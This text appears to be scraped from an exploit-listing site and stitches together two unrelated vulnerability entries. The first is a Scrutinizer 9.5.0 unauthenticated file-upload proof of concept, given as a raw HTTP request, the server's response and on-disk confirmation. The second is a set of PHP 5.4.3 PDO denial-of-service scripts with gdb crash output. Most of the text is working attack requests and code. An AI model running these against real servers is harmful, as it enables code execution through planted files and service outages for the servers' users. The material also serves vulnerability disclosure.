    source: https://www.securityfocus.com/bid/54726/info Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. #Request POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210 --_Part_949_3365333252_3066945593 Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt" Content-Type: application/octet-stream trustwave --_Part_949_3365333252_3066945593-- #Response HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html {"success":1,"file_name":"trustwave.txt"} #Confirming on File System C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" trustwave
  25. HireHackking

    PHP 5.4.3 - PDO Memory Access Violation Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54777/info PHP is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users. PHP 5.4.3 is vulnerable; other versions may also be affected. <?php try { $db = new PDO('mysql:host=localhost;dbname=aws', "root", ""); //tokens: // SELECT;*;from;'user';/* //$sql = "SELECT * from 'user'/*"; $stmt = $db->prepare("SELECT * from 'user'".mysql_real_escape_string($_GET['query'])); $stmt->execute(); //crash $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); print_r( $type); } catch (Exception $e) { echo "Failed: " . $e->getMessage(); } ?> ----- <?php try { $db = new PDO('mysql:host=localhost;dbname=aws', "root", ""); //tokens: // SELECT;*;from;'user';/* $sql = ":/*"; $stmt = $db->prepare($sql); $stmt->execute(); // crashes php worker in pdo_parse_params() $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); print_r( $type); } catch (Exception $e) { echo "Failed: " . $e->getMessage(); } ?> --- <pre> <?php echo "hmm beginning\n"; try { $db = new PDO('mysql:host=localhost;dbname=aws', "root", ""); echo "lets get it on\n"; //tokens: // SELECT;*;from;'user';/* $sql = "SELECT * from user :/**"; echo $sql; $stmt = $db->prepare($sql); echo "prepared :)\n"; print_r($stmt); $stmt->execute(); // crashes php worker in pdo_parse_params() print_r($stmt); echo "executed :(\n"; $stmt->bindColumn(2, $type, PDO::PARAM_STR, 256); $stmt->fetch(PDO::FETCH_BOUND); echo "--data-\n"; print_r( $type); echo "--data--\n"; } catch (Exception $e) { echo "EXCEPTION"; echo "Failed: " . $e->getMessage(); } echo "hmmm end\n"; ?> </pre> Actual result: -------------- root@bt:/opt/lampp# gdb ./bin/php (gdb) run poc_pdo_linux_short_1.php Starting program: /opt/lampp/bin/php /opt/lampp/poc_pdo_linux_short_1.php [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. 0x08228a81 in ?? () (gdb) bt #0 0x08228a81 in ?? () #1 0x082280eb in pdo_parse_params () #2 0x08223891 in ?? () #3 0x084b2aad in ?? () #4 0x084b1f87 in execute () #5 0x08490ed2 in zend_execute_scripts () #6 0x0843f13c in php_execute_script () #7 0x08506b46 in main ()